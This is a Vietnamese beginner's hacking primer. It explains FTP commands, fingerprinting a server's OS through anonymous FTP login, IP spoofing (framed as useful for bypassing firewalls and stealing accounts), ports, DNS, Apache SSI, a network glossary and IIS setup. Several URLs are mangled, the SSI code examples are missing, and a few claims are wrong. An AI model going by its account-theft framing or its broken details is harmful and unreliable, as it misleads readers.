Kiến thức về hack và crack (P1) - Cơ bản

Màu nền
Font chữ
Font size
Chiều cao dòng

PHẦN 1

: KIẾN THỨC CƠ BẢN

Tìm hiểu về FTP :

Giới thiệu

FTP là chữ viết tắt của File Transfer Protocol - Giao thức truyền file. FTP là một giao thức truyền file trên mạng dựa trên chuẩn TCP nên rất đáng tin cậy!

Một số lệnh phổ biến của FTP

Sau đây là danh sách một số lệnh thường dùng kèm theo hướng dẫn mà bạn cần biết!

ascii

chuyển sang chế độ truyền file theo dạng văn bản

Binary

chuyển sang chế độ truyền file theo dạng nhị phân

cd [directory]

chuyển vào thư mục directory

Cdup

chuyển lên thư mục cấp trên một cấp

close

ngắt kết nối với máy chủ

del

[remote-file]

xóa 1 file trên máy chủ

dir [remote-directory|file]

liệt kê nội dung của thư mục hoặc danh sách các file trên máy chủ

help [command]

cho biết hướng dẫn về lệnh command

lcd [local-directory]

đặt lại thư mục làm việc trên client là local-directory

ls [remote-directory|file] [-la]

liệt kê nội dung của thư mục hoặc danh sách các file trên máy chủ; tham số -la sẽ liệt kê tất cả có kèm theo mô tả về quyền

mdelete [remote-files]

xóa nhiều file trên máy chủ

mget [remote-files]

download các files trên máy chủ về

mkdir <directory-name>

tạo thư mục có tên directory-name

mput [local-files]

upload các files lên máy chủ

open host [port]

kết nối đến máy chủ FTP có hostname là host và đang chạy dịch vụ FTP ở cổng port

put <local-file> [remote-file]

upload local-file lên máy chủ với tên mới là remote-file nếu được

pwd

cho biết thư mục đang làm việc hiện thời

quit

thoát

recv <remote-file> [local-file]

nhận remote-file trên máy chủ và lưu trên máy tính với tên local-file nếu được

rename [from] [to]

đổi tên file hoặc thư mục from thành to

rmdir directory-name

xóa thư mục có tên directory-name

send local-file [remote-file]

gởi local-file từ máy tính lên máy chủ với tên mới là remote-file nếu được

status

cho biết trạng thái của phiên làm việc hiện tại

syst

cho biết hệ điều hành của máy chủ

user user-name [password] [account]

login vào với tên là user-name, mật khẩu là password, tài khoản là account

?

gọi hướng dẫn

Các ví dụ

Để dễ hiểu, các bạn hãy xem các ví dụ sau:(tôi sử dụng các này để upload mấy file lên website đó, không cần dùng các chương trình FTP mạnh như WS_FTP Pro, FTPNet, CuteFTP, AbsoluteFTP, ...!) Tôi lưu trang web cần tải lên server trong c:\website! Bây giờ tôi sẽ tải nó lên!

C:\website>ftp myftpsrv // kết nối đến máy chủ myftpsrv

Connected to myftpsrv.

User (ftpsrv:(none)): dt

331 User name okay, need password.

Password:

230 User logged in, proceed.

ftp> pwd // cho biết thư mục hiện tại đang làm việc!

257 "/home/dt" is current directory.

ftp> status // xem trạng thái hiện tại

Type: ascii; Verbose: On ; Bell: Off ; Prompting: On ; Globbing: On

Debugging: Off ; Hash mark printing: Off . // ascii=1

ftp> cd www // chuyển vào thư mục www

250 Directory changed to /home/dt/www

ftp> put index.html // upload file index.html lên server

200 PORT Command successful.

150 Opening ASCII mode data connection for index.html.

226 Transfer complete.

ftp: 2095 bytes sent in 0.00Seconds 2095000.00Kbytes/sec.

ftp> mkdir tools // tạo thư mục /home/dt/www/tools

257 "/home/dt/www/tools" directory created.

ftp> cd tools // chuyển vào thư mục tools

250 Directory changed to /home/dt/www/tools

ftp> lcd c:\website\tools // thay đổi lại local directory = c:\website\tools

Local directory now C:\website\tools.

ftp> bin // chuyển sang chế độ truyền file nhị phân

200 Type set to I.

ftp> mput *.* // upload tất cả các file trong c:\website\tools lên server, vào /home/www/tools/

mput test.zip? y

200 PORT Command successful.

150 Opening BINARY mode data connection for test.zip.

226 Transfer complete.

ftp: 10168 bytes sent in 0.06Seconds 169.47Kbytes/sec.

mput test.exe? y

200 PORT Command successful.

150 Opening BINARY mode data connection for test.exe.

226 Transfer complete.

ftp: 54625 bytes sent in 0.11Seconds 496.59Kbytes/sec.

ftp> ls -la // liệt kê nội dung của /home/www/tools

200 PORT Command successful.

150 Opening ASCII mode data connection for /bin/ls.

drwxr--r-- 1 dt group 0 Sep 30 14:13 .

drwxr--r-- 1 dt group 0 Sep 30 14:13 ..

-rwxr--r-- 1 dt group 54625 Sep 30 14:14 test.exe

-rwxr--r-- 1 dt group 10168 Sep 30 14:14 test.zip

226 Transfer complete.

ftp: 247 bytes received in 0.00Seconds 247000.00Kbytes/sec.

ftp> del test.exe // tôi lỡ tay upload lên file test.exe, bây giờ tôi cần phải xóa nó

250 DELE command successful.

ftp> cd .. // chuyển lên thư mục cấp trên

250 Directory changed to /home/dt/www

ftp> mkdir cgi-bin2 // tạo thư mục mới

257 "/home/dt/www/cgi-bin2" directory created.

ftp> rename cgi-bin2 cgi-bin // tôi đã nhập vào sai mất rồi, bây giờ phải đổi tên lại thôi!

350 File or directory exists, ready for destination name

250 RNTO command successful.

ftp> cd cgi-bin // chuyển vào thư mục cgi-bin

250 Directory changed to /home/dt/www/cgi-bin

ftp> lcd c:\website\cgi-bin // đặt lại local directory!

Local directory now C:\website\cgi-bin.

ftp> ascii // chuyển sang chế độ truyền file văn bản vì tôi cần upload một số file .cgi + .pl

200 Type set to A.

ftp> put test.cgi // upload file test.cgi

200 PORT Command successful.

150 Opening ASCII mode data connection for test.cgi.

226 Transfer complete.

ftp: 222 bytes sent in 0.00Seconds 222000.00Kbytes/sec.

ftp> ls -la // xem nội dung của /home/www/cgi-bin

200 PORT Command successful.

150 Opening ASCII mode data connection for /bin/ls.

drwxr--r-- 1 dt group 0 Sep 30 14:16 .

drwxr--r-- 1 dt group 0 Sep 30 14:16 ..

-rwxr--r-- 1 dt group 222 Sep 30 14:17 test.cgi

226 Transfer complete.

ftp: 182 bytes received in 0.00Seconds 182000.00Kbytes/sec.

ftp> site chmod 755 test.cgi // đặt quyền 755(wrxx-xr-x) cho file test.cgi

ftp> ls -la // tôi liệt kê lại thư mục cgi một lần nữa

200 PORT Command successful.

150 Opening ASCII mode data connection for /bin/ls.

drwxr-xr-x 1 dt group 0 Sep 30 14:16 .

drwxr-xr-x 1 dt group 0 Sep 30 14:16 ..

-rwxr-xr-x 1 dt group 222 Sep 30 14:17 test.cgi

226 Transfer complete.

ftp: 182 bytes received in 0.00Seconds 182000.00Kbytes/sec.

ftp> bye // tất cả đã xong, bây giờ tôi có thể ngắt kết nối được rồi!

221 Goodbye!

C:\website>

Hi vọng là bạn hiểu được ví dụ trên!

Nói thêm về FTP

Làm thế nào để kết nối với một máy chủ FTP qua một proxy-server, chẳng hạn như Wingate? Chỉ cần ftp đến proxy-server này và gõ vào như dạng sau, user@host[:port]. Ví dụ máy tôi đang chạy Wingate-FTP ở cổng 21 và Serv-U FTP-Server v2.5i ở cổng 2121, tôi có thể kết nối đến Serv-U FTP-Server v2.5i qua Wingate-FTP như sau:

C:\>ftp localhost

Connected to dt.

220 WinGate Engine FTP Gateway ready

User (dt:(none)): dt@localhost:2121

331 User name okay, need password.

Password:

230 User logged in, proceed.

ftp>

Okay, bây giờ tôi upload và download file như bình thường được rồi!

Hack với FTP

Đôi khi FTP cũng cho biết một số thông tin rất quan trọng! Bạn dễ dàng đoán được hệ điều hành của máy chủ FTP! Hãy xem các ví dụ sau:

C:\>ftp localhost

Connected to dt.

220 dt Microsoft FTP Service (Version 1.0).

User (dt:(none)): anonymous

331 Anonymous access allowed, send identity (e-mail name) as password.

Password:

230-Windows 95 FTP Service.

230 Anonymous user logged in as anonymous.

Yeah! Chắc ăn là server này là PWS chạy trên Windows!

Nếu như admin vô hiệu hóa dòng quảng cáo trên thì sao!? Vẫn còn cách khác! Bạn login vào và phát lệnh syst như sau:

ftp> literal syst

215 Windows_NT version 4.10

Hình như hệ điều hành của máy chủ là Win9.x hoặc WinNT thì phải!

(Nếu bạn đang chạy Linux* thì chỉ cần gõ syst).

Các khái niệm cơ bản về Internet :

Các khái niệm cơ bản Internet

Địa chỉ IP được chia thành 4 số giới hạn từ 0 - 255. Mỗi số được lưu bởi 1 byte -> IP có kích thước là 4byte, được chia thành các lớp địa chỉ. Có 3 lớp là A, B, và C. Nếu ở lớp A, ta sẽ có thể có 16 triệu điạ chỉ, ở lớp B có 65536 địa chỉ. Ví dụ: Ở lớp B với 132.25,chúng ta có tất cả các địa chỉ từ 132.25.0.0 đến 132.25.255.255. Phần lớn các địa chỉ ở lớp A llà sở hữu của các công ty hay của tổ chức. Một ISP thường sở hữu một vài địa chỉ lớp B hoặc C. Ví dụ: Nếu địa chỉ IP của bạn là 132.25.23.24 thì bạn có thể xác định ISP của bạn là ai. ( có IP là 132.25.x.)

IP thể hiện điều gì:

Trên mạng Internet nó sẽ xác định chính bạn. Khi kết nối vào mạng thì IP của bạn là duy nhất trên thế giới. Tuy nhiên số này chưa hẳn là cố định. Nếu bạn vào mạng qua một ISP thì số IP của bạn sẽ thay đổi ở các lần bạn kết nối.

Một người biết IP của bạn thì có thể lần ra vị trí của bạn. Nghĩa là khi có IP thì biết được địa chỉ của ISP rồi biết được thông tin của bạn. Trên thực tế, IP cho biết về máy tính được sử dụng để vào mạng chứ không cho biết thông tin về người sử dụng, trừ khi IP của bạn là cố định hoặc sử dụng account của riêng bạn.

Sự khác nhau giữa logic (hostname) và một địa chỉ IP:

Đơn giản chỉ bởi vì việc gọi tên, ví dụ http://k.domaindlx.com/clairsang/www.tungxeng.nt.ms/default.htm sẽ dễ hơn nhiều đối với việc phải gọi 202.32.156.14. Tuy vậy, có một sự khác biệt quan trọng giữa 2 điều này. IP là số để xác định thiết bị (device) còn hostname là một mối liên kết giữa 1 từ khoá và một số IP. Một địa chỉ IP có thể có nhiều hostname khác nhau nhưng một hostname thì chỉ có một IP liên kết với nó.

IP spoofing là gì:

Một số IP có mục đích để xác định một thiết bị duy nhất trên thế giới. Vì vậy trên mạng một máy chủ có thể cho phép một thiết bị khác trao đổi dữ liệu qua lại mà không cần kiểm tra máy chủ.

Tuy nhiên có thể thay đổi IP của bạn, nghĩa là bạn có thể gởi một thông tin giả đến một máy khác mà máy đó sẽ tin rằng thông tin nhận được xuất phát từ một máy nào đó (tất nhiên là không phải máy của bạn). Bạn có thể vượt qua máy chủ mà không cần phải có quyền điều khiến máy chủ đó. Điều trở ngại là ở chỗ những thông tin phản hồi từ máy chủ sẽ được gởi đến thiết bị có IP mà chúng ta đã giả mạo. Vì vậy có thể bạn sẽ không có được sự pảhn hồi những thông tin mà mình mong muốn. Có lẽ điều duy nhất mà spoof IP có hiệu quả là khi bạn cần vượt qua firewall, trộm account và cần dấu thông tin cá nhân!

Cổng ảo là gì? (Virtual Port)

Cổng ảo là 1 số tự nhiên đựợc gói ở trong TCP(Tranmission Control Protocol) và UDP(User Diagram Protocol) header (hiện có lẽ bạn còn xa lạ với 2 từ này, chúng tôi sẽ đề cập sau). Như mọi nguòi đã biết, Windows có thể chạy nhiều chương trình 1 lúc, mỗi chương trình này có 1 cổng riêng dùng để truyền và nhận dữ liệu. Ví dụ 1 máy có địa chỉ IP là 127.0.0.1 chạy WebServer, FTP_Server, POP3 server, etc, những dịch vụ này đều đuọc chạy trên 1 IP address là 127.0.0.1, khi một gói tin được gửi đến làm thế nào máy tính của chúng ta phân biệt được gói tin này đi vào dịch vụ nào WebServer hay FTP server hay SMTP ? Chính vì thế Port xuất hiện. Mỗi dịch vụ có 1 số port mặc định, ví dụ FTP có port mặc định là 21, web service có port mặc định là 80, POP3 là 110, SMTP là 25 vân vân.... Người quản trị mạng có thể thay đổi số port mặc định này, nếu bạn ko biết số port trên một máy chủ, bạn ko thể kết nối vào dịch vụ đó được. Chắc bạn đã từng nghe nói đến PORT MAPPING nhưng có lẽ chưa biết nó là gì và chức năng thế nào. Port mapping thực ra đơn giản chỉ là quá trình chuyển đổi số port mặc định của một dịch vụ nào đó đến 1 số khác. Ví dụ Port mặc định của WebServer là 80, nhưng thỉnh thoảng có lẽ bạn vẫn thấy http://www.xxx.com:8080 , 8080 ở đây chính là số port của host xxx nhưng đã đuợc nguòi quản trị của host này "map" từ 80 thành 8080.

RFC là gì?

RFC là viết tắt của Request For Comment, là tập hợp những tài liệu về kiến nghị, đề xuất và những lời bình luận liên quan trực tiếp hoặc gián tiếp đến công nghệ, nghi thức mạng INTERNET. Các tài liệu RFC đựợc chỉnh sửa, thay đổi đến khi tất cả các kỹ sư thành viên của IETF(Internet Engineering Task Force) đồng ý và duyệt, sau đó những tài liệu này được xuất bản và được công nhận là 1 chuẩn, nghi thức cho Internet. Tài liệu RFC nổi tiếng và làm tạo được tiếng vang lớn nhất là tài liệu RFC số 822 về Internet Email bởi Dave Crocker.

Trang chủ của RFC: http://www.ietf.org/rfc.html

DNS là gì? Tại sao ta lại dùng DNS, DNS làm việc ra sao, tên miền là gì, etc...?

DNS là viết tắt của Domain Name System. Một máy chủ DNS đợi kết nối ở cổng số 53, có nghĩa là nếu bạn muốn kết nối vào máy chủ đó, bạn phải kết nối đến cổng số 53. Máy chủ chạy DNS chuyển hostname bằng các chữ cái thành các chữ số tương ứng và ngược lại. Ví dụ: 127.0.0.1 --> localhost và localhost--->127.0.0.1

Hệ thống "tên đến địa chỉ" (name-to-address) được dùng trước đây khi DNS chưa ra đời, đây thực chất là 1 file trên server. Cấu tạo của 1 file này là 1 table với "hostname" và địa chỉ IP tương ứng, file này được cập nhật và bảo quản bởi Standford Reserch Institute Network Information Center (SRI-NIC). Vài lần 1 tuần, tổ chức này lại cập nhật nội dung file này. Những nguòi quản trị mạng nếu cần sẽ download file này xuống để dùng cho local DNS. Dần dần, số lượng của các trang web trên internet ngày càng nhiều.

Cách cũ dùng "name-to-address" trở nên thiếu hiệu quả và tốn thời gian --> DNS ra đời. DNS ko phụ thuộc vào bất cứ 1 server riêng rẽ nào, DNS được phân phát cho nguòi dùng dưới dạng 1 file cơ! sở dữ liệu, file này được giũ trên khắp các DNS server trên toàn thế giới. Mỗi DNS server đều tự tìm kiếm một DNS cao hơn khi nhân được yêu cầu về 1 host nào đó ko có trong cơ sở dữ liệu trên máy mình

Máy chủ DNS (DNS Server)

DNS server là 1 máy tính bình thường có thể PC(/MAC) chạy UNIX hoặc nhân bản của Unix (Linux,etc..) và chay một chương trình quản lý domain name gọi là BIND (Berkely Internet Name Domain). DNS server có thể chạy các hệ điều hành khác như Windows, MacOS nhưng thường thì *nix hay được chọn hơn cả vì unix có tính bảo mật cao hơn và cho phép lượng truy cập lớn hơn.

Chương trình quản lý DNS được thiết kế chia làm 2 phần, phần thứ nhất là 1 "daemon" nghe ở cổng 53 đợi kết nối. Phần thứ 2 là để gửi yêu cầu lên một DNS cao hơn nếu local database ko có thông tin mà máy khách yêu cầu. Phần thứ nhất (daemon) trả lời trình duyệt web mỗi khi nhận được yêu cầu. Ví dụ, khi bạn mở Internet Explorer và đánh vào www.hackervn.org, trình duyệt của bạn sẽ gửi yêu cầu đến 1 máy chủ có dịch vụ DNS gần nhất để tìm IP của www.hackervn.org vì trình duyệt của bạn cần biết IP máy chủ hiện đang lưu trữ trang web www.hackervn.org. Máy chủ DNS ở ISP của bạn sẽ tìm trong cơ sở dữ liệu, nếu ko tìm thấy địa chỉ IP cho www.hackervn.org máy chủ chạy DNS này sẽ chuyển sang phần thứ 2 là đưa yêu cầu của máy khách đến 1 máy chủ DNS cao cấp hơn, nhiều dữ liệu hơn để giải quyết.

Định dạng cây của DNS (tree formation)

Một khi DNS server ko thể tìm thấy số IP tương ứng cho 1 hostname trong cơ sở dữ liệu của mình, server đó sẽ gửi yêu cầu đến 1 DNS server khác cao hơn 1 bậc, và DNS server này sẽ lặp lại quá trinh mà DNS server dưới đã làm để tìm địa chỉ IP của 1 host nào đó. Nếu DNS server này vẫn ko tìm thấy thì yêu cầu sẽ lại được gửi đến 1 DNS server khác cao hơn nữa và quy trình này sẽ được tiếp tục cho đến khi nào ra kết quả. Kết quả của yêu cầu này chỉ có thể là "Tìm Thấy" hoặc "Ko tìm thấy". :-) . Đến thời điểm này, chắc bạn đã hình dung ra được cấu trúc của các DNS server như thế nào rồi? N? u chưa, hãy nhìn vào ví dụ dưới đây:

Ví dụ

nhà cung cấp internet của bạn là FPT. Trang web đặt trên máy chủ của FPT là www.fpt.vn. Mặc định, DNS server sẽ là dns.fpt.vn. Bây giờ bạn muốn truy cập www.hackervn.org. dns.fpt.vn sẽ tìm thông tin về host này ở trong cơ sở dữ liệu trên máy chủ DNS ở FPT xem ai đó đã gửi thông tin truy cập về host này chưa. Nếu điạ chỉ hackervn ko được tìm thấy ở "local database" hoặc trong bộ nhớ, dns.fpt.vn sẽ đưa yêu cầu này đến 1 DNS server cao cấp hơn, ở đây s? là "dns.vn". DNS server này quản lý tất cả các trang có đuôi .vn. Tuy nhiên server này có thể ko có địa chỉ này trong cơ sở dữ liệu nhưng có thể có vì có thể ai đó đã truy cập trang này. Nếu ở đây vẫn ko tìm thấy host/ip cần tìm, DNS server này cuối cùng phải gửi request đến DNS server lớn nhất quản lý tất cả các domain gọi là ".root". Máy chủ chạy .root DNS này là một máy tính rất mạnh, và cơ sở dữ liệu của .root này bao gồm tất cả các loại domain trên toàn thế giới. như .com , .net , .mil, .co.uk, vân vân.....

Căn bản về SSI trên Apache :

Using Server Side Includes

Trong khi các file HTML chuẩn dùng cho lưu giữ các trang rất tốt, thì khả năng tạo ra một số nội dung động của nó cũng rất đáng hoan nghênh. Lấy ví dụ, đưa thêm vào một footer hay một header vào tất cả các file, hoặc là đưa vào thông tin về tài liệu ví như thời gian sửa đổi gần nhất một cách tự động. Điều này có thể thực hiện bằng CGI được, nhưng nó lại đòi hỏi những kĩ năng lập trình hoặc viết mã kịch bản mà vấn đề đó thì không hề đơn giản. Đối với những trang tài liệu động đơn giản thì chúng ta có một giải pháp thay thế khác: đó là các nội dung đưa vào từ máy chủ (SSI). Bài này là một trong loạt bài về SSI do chúng tôi biên soạn, với các mức độ khác nhau về cú pháp. Nếu các bạn muốn theo dõi về chủ đề này xin đến với Diễn dàn Công nghệ thông tin VN

http://cnttvn.cjb.net/

SSI cho phép bạn gắn kèm một số câu lệnh đặc biệt vào trong chính trang HTML. Khi mà server đọc một tài liệu có chứa SSI, nó sẽ tìm kiếm các câu lệnh này và thực hiện các hành động cần thiết. Ví dụ, có một câu lệnh SSI thực hiện chức năng nhập vào thời gian sửa đổi gần nhất của tài liệu. Khi server đọc được một file có dòng lệnh này trong đó, nó sẽ thay thế dòng lệnh bằng thời gian thích hợp.

Apache có chứa một tập hợp các câu lệnh SSI dựa theo một số câu lệnh có trong máy chủ NCSA cộng với nhiều câu lệnh mở rộng khác.

Điều này được thực hiện với the includes module (mod_includes). (Bạn có thể hiểu là một chương trình có chức năng tổng hợp)

Telling Apache to Use SSI

Theo mặc định thì máy chủ không hơi đâu mà đi tìm trong các file HTML xem có các câu lệnh SSI hay không. Điều này làm giảm tốc độ mọi lần truy cập đến một file HTML. Để sử dụng SSI bạn cần báo cho Apache biết là các tài liệu nào thì có chứa các câu lệnh SSI.

Một cách để làm được điều này là dùng một file có phần mở rộng đặc biệt. Thường thì người ta dùng .shtml, và nó có thể được lên cấu hình (configured) cùng với cái directive tức cái lời hướng dẫn này:

AddHandler server-parsed .shtml

AddType text/html shtml

Chỉ thị AddHandler bảo cho Apache biết cách xử lý mọi file .shtml như là một loại mà có chứa các câu lệnh SSI. Chỉ thị AddType thì thực hiện cái điều là làm cho các nội dung được xử lý ấy được đánh dấu như là HTML để trình duyệt hiển thị nó một cách chính xác.

Một phương pháp thay thế khác để thông báo cho server biết file nào là có chứa các câu lênh SSI là sử dụng cái gọi là XBitHack. Cái này liên quan đến việc thiết lập the execute bit mà tôi tạm dịch là bit thực thi trên các file HTML. Bất cứ một file này có loại nội dung (content type) là text/html (ví dụ có phần mở rộng là .html) và có chứa một tập hợp bit thực thi thì sẽ được kiểm tra xem có chứa các câu lệnh SSI hay không. Để làm điều này thì cần phải đưa vào chỉ thị XBitHack .

Trong cả hai phương pháp thì server cũng cần phải được lên cấu hình để cho phép dùng các câu lệnh SSI. Điieù này đượct hực hiện với chỉ thị Options Includes , cái này cần được đặt trong hoặc là tệp tin toàn cục mang tên access.conf (the global access.conf) hoặc là tệp tin địa phương .htaccess (local .htaccess) (mặc dầu là cái thứ hai bắt buộc phải được enabled bằng chỉ thị AllowOverride Options). Bởi vì một số câu lệnh SSI cho phép dùng các chương trình thực thi mà có thể mang tới rủi ro về vấn đề security, nên có một giải pháp thay thế tùy chọn, IncludesNOExec cho phép các câu lệnh SSI đều thực hiện được ngoại trừ những câu lệnh nào thực thi một chương trình.

SSI Commands

Tất cả các câu lệnh SSI được lưu giữ trong file HTML bằng các kí hiệu ghi chú của HTML. Một câu lệnh SSI bình thường trông giống như thế này:

Trong trường hợp này câu lệnh là flastmod, nó có nghĩa là đưa ra thông tin là thời gian sửa đổi gần nhất của file đó. Các đối số (argument) xác định cụ thể file đó là "this.html" (đây là tên của file có chứa câu lệnh này). Toàn bộ phần viết ra câu lệnh, mà được chứa trong kí hiệu đánh dấu phần chú thích ãe được thay thế bằng kết quả của câu lệnh này.

Nói chung thì tất cả các câu lệnh đều có cái format tức cái công thức như sau:

trong đó arg1, arg2, vân vân là các cái tên của các đối số và value1, value2 vân vân là các giá trị của các đối số đó. Trong ví dụ về flastmod, đối số là 'file' và giá trị của nó là 'this.html'. Thường thì các câu lệnh có thể nhận các tên của đối số khác nhau. Ví dụ, flastmod có thể được trao cho một URL với đối số là virtual, để lấy được thời gian của lần sửa đổi gần nhất từ server. Ví dụ:

để nhận được thời gian sửa đổi gần nhất của trang chủ trên server đó (điều này là hữu ích nếu như trang được truy cập đó có thể có một tên khác, ví dụ là như thế).

Bên cạnh flastmod, có các câu lệnh SSI làm chức năng là lấy kích thước (size) của một file hay một URL, các nội dung của một biến (được máy chủ truyền vào trong), các nội dung của một file khác hay URL khác, hoặc kết quả của việc chạy một local file tức là một tệp tin trong nội bộ site. Những câu lệnh này được nêu ra trong NCSA tutorial về vấn đề server side includes.

Khi các câu lệnh SSI được thực thi, một số các biến môi trường ('environment variables') được thiết lập. Điều này hàm chứa các biến CGI (REMOTE_HOST etc), và thêm một số cái nữa, như là DOCUMENT_NAME và LAST_MODIFIED. Các biến này có thể là thông tin đầu ra (output) với câu lệnh echo (do vậy cách tốt hơn để lấy ra thời gian sửa đổi gần nhất của file hiện thời sẽ là ).

Extended SSI

Apache mở rộng ngôn ngữ SSI chuẩn (NCSA-compatible) một cách đáng kể. Một số mở rộng gồm có:

Các biến trong các câu lệnh: Apache cho phép các biến được dùng trong bất cứ một câu lệnh SSI nào. Ví dụ, thời gian sửa đổi gần nhất của tài liệu hiện thời có thể lấy ra với

Thiết lập các biến: câu lệnh set có thể được dùng bên trong SSI để thiết lập các biến.

Các điều kiện: các câu lệnh SSI if, else, elif và endif có thể được dung để đưa các phần của file vào dựa trên các kiểm tra mang tính điều kiện. Ví dụ, biến $HTTP_USER_AGENT có thể được kiểm tra để xem loại của trình duyệt và thông tin đầu ra bằng các mã HTML khác nhau tùy thuộc vào các khả năng của trình duyệt ấy.

Các ví dụ

Đây là một số ví dụ dùng SSI:

Displaying document information

Mã sau đây đặt thời gian sửa đổi gần nhất lên trang đó:

Last modified:

Adding a footer to many documents

Hãy đặt đoạn mã sau đây xuống tận cùng của mỗi trang tài liệu:

Hide links from external users

Dùng câu lệnh if và biến REMOTE_ADDR CGI để xem xét xem liệu người sử dụng đó có ở trong vùng nội bộ hay không

(the local domain):

Internal Documents

(Trong đó 1.2.3 là phần đầu (prefix) của địa chỉ IP của the local domain).

Một số thuật ngữ về mạng :

AAL: (ATM Adaptation Layer). Một phần của các giao thức chuẩn ATM.

ABR:. Available Bit Rate, một tham số cho dịch vụ trong ATM mà không bảo đảm cho tốc độ.

. Area Border Router, một quy ước trong OSPF cho một bộ định tuyến để thông tin liên lạc với vùng khác.

ACK: Viết tắt của từ Acknowledgement

ACK implosion: Để chỉ môt vấn đề mà có thể xảy ra với giao thức mutilcast đáng tin cậy, trong đó có nhiều ACK đi ngược trở về nguồn.

AH: (Authentication Header).Một phần đầu được sử dụng bởi IPsec để đảm bảo việc xác minh nguồn gốc của datagram.

ANSNET:.Một mạng diện rộng mà đã hình thành nên backbone của Internet cho đến năm 1995.

ARP: (Address Resolution Protocol). Giao thức TCP/IP được sử dụng để liên kết động một địa chỉ IP cấp cao vào một địa chỉ phần cứng cấp thấp.

AS: (Autonomous System). Một tập hợp cac bộ định tuyến và các mạng thuộc về một đơn vị quản trị và hợp tác chặt chẽ với nhau để nhân bản thông tin về khả năng đi đến các mạng (và thông tin định tuyến) giữa chúng với nhau, sử dụng giao thức cổng nội.

ASN-1: (Abstract Syntax Notation - 1). Giao thức chuẩn ISO được sử dụng bởi SNMP để thể hiện các thông điệp.

ATM: (Asynchronous Transfer Mode). Một kỹ thuật mạng định hướng kết nối mà sử dụng những cell nhỏ có kích thước cố định ở mức thấp nhất. ATM có ưu điểm về khả năng hỗ trợ dữ liệu thoại và video.

ATM Adaptation Layer (ALL):. Một trong số các giao thức được định nghĩa cho ATM để xác định cách một chương trình ứng dụng gửi và nhận thôgn tin qua mạng ATM.

ATMARP: Giao thức mà một máy sử dụng cho việc giải địa chỉ khi gửi IP qua mạng ATM.

AUI: Bộ kết nối đươc sử dung cho Ethernet dây dày.

BGP: ( Border Gateway Protocol)

Một kỹ thuật cổng ngoại chủ yếu, được sử dụng trong Internet.

BootTP: (BootStrap Protocol), một giao thức máy tính sử dụng để lấy thông tin khởi động từ server, bao gồm địa chỉ IP của nó.

CBT: (Core Based Tress)

Giao thức định tuyến multicast do nhu cầu điều khiển mà xây dựng nên cây dùng chung.

CGI: (Common Gateway Interface)

Một kỹ thuật mà server sử dụng để tạo trang Web tự động khi nhận được yêu cầu.

CIDR: (Classless Inter-Domain Routing)

Là chuẩn xác định các chi tiết của cả hai việc định địa chỉ không phân lớp cũng như mô hình định tuyến tương ứng.

COPS: (Common Open Policy Service)

Giao thức được sử dụng với RSVP để kiểm chứng xem lời yêu cầu có thoả mãn các chính sách ràng buộc.

DHCP: (Dynamic Host Configuration Protocol)

Một giao thức mà máy sử dụng để lấy dược tất cả thông tin cấu hình cần thiết, bao gồm cả địa chỉ IP.

DNS: (Domain Name System)

Hệ cơ sở dữ liệu phân bố trực tuyến được sử dụng để ánh xạ các tên máy thông dụng đối với con người thành các địa chỉ IP.

DVMRP: (Distance Vector multicast Routing Protocol)

Một giao thức được sử dụng để nhân bản các tuyến đường multicast.

EGP: (Exterior Gateway Protocol)

Một thuật ngữ áp dụng cho giao thức nào được sử dụng bởi bộ định tuyến trong một hệ tự quản để thông báo khả năng đi đến mạng cho ho bộ định tuyến trong hệ tự quản khác.

FIN: Một segment TCP đặc biệt được dùng để đóng một kết nối.

FTP: (File Transfer Protocol)

Chuẩn TCP/IP, giao thức cấp cao cho việc truyền tập tin từ máy này đến máy khác.

Các bước cấu hình Localhost :

Bước 1 : Kiểm tra IIS :

Bạn kiểm tra xem máy bạn đã cài IIS chưa, Vào Control Panel/Add-Remove Windows Components. Trong phần Windows Components Wizard xem cái Internet Information Services (IIS) có được đánh dấu không. Nếu chưa thì đánh dấu vào đó. Nhấn Next/Finish/Close để cài IIS.

Mở IE lên, gõ vào

http://k.domaindlx.com/clairsang/localhost/default.htm

xem có chạy không. Nếu hiện ra màn hình của IIS thì đã thành công.

Bước 2: Cấu hình IIS

(Bước này không cần thiết nếu như bạn chưa đụng chạm nhiều vào Win, tuy nhiên cũng tìm hiểu một chút để nắm rõ hơn)

Hãy vào Start/Programs/Administrative Tools/Configure Your Server , Nếu thấy hiện cửa sổ cho phép bạn lựa chọn server. Hãy chọn "This is the only server in my network".

Việc này thường được làm ngay sau khi cài Win. Bạn có thể bỏ bước này nếu như chưa thay đổi gì trong đó.

Chọn next ở bước tiếp theo. Nếu thích bạn có thể đọc hướng dẫn trên mà hình để tìm hiểu. Theo tôi thì không cần thiết.

Trong 2 ô để trống của cửa sổ mới bạn chỉ cần điền "local" vào mỗi ô. Chọn next. Máy sẽ tự động cài đặt cái Localhost cho bạn. Bạn sẽ gặp báo lỗi chưa chuyển Partition cho đĩa sang NTFS 5.0 (nếu bạn vẫn sử dụng FAT32), tuy nhiên không vấn đề gì đâu. Cứ OK cho qua thôi.

Vậy là xong việc thứ hai, bạn có thể đóng cửa sổ Configure Your Server.

Các chương trình cần thiết !!

1. Cài ActivePerl

Download ở

http://k.domaindlx.com/clairsang/www.activeperl.com/default.htm

Nên cài chương trình này vào thư mục mặc định là C:\Perl

2. Config để ActivePerl chạy file *.cgi

Vào Start/Programs/Administrative Tools/Internet Services Manager.

Bấm chuột phải vào Default Web Site, vào Properties

Chọn Home Directory. Nhớ đánh dấu vào Script and source access và Read, bỏ đánh dấu ở Write (nếu có).

Ở Execute Permission, chọn Scripts and Executables. Ấn Apply và chọn toàn bộ. OK.

Click vào nút Configuration... cạnh Execute Permission, chọn Add. Chọn Brows và tìm thư mục C:/Perl/bin. Ở File of Type (cuối cửa số Open) chọn Dinamic Linked Libraries (*.dll). Lên chọn PerllS.dll. Click Open.

Gõ .cgi (đừng quên dấu chấm trước cgi) vào Extension

Chọn Limit to, gõ vào đó các chữ GET,HEAD,POST (khỏi cần dấu cách). Click OK / OK / OK

Vậy là bạn đã config xong cái Localhost cho máy của bạn. Nhớ rằng mọi thứ mà bạn muốn đặt vào trang Web của mình, bạn hãy copy vào thư mục C:/Inetpub/wwwroot Đây sẽ là thư mục gốc của Web. Còn nếu bạn muốn chạy các file ở đó, đường dẫn sẽ là

http://k.domaindlx.com/clairsang/localhost/t_25c3_258an_file.

Ví dụ như bạn muốn chạy cái cp.cgi của UBB, đơn giản bạn chỉ cần chạy

http://k.domaindlx.com/clairsang/localhost/cp.cgi

Vậy thôi.

3. Kiểm tra xem CGI và PL đã chạy chưa

Để test Perl, hãy tạo 2 file "hello.cgi" và "hello.pl" có cùng nội dung sau:

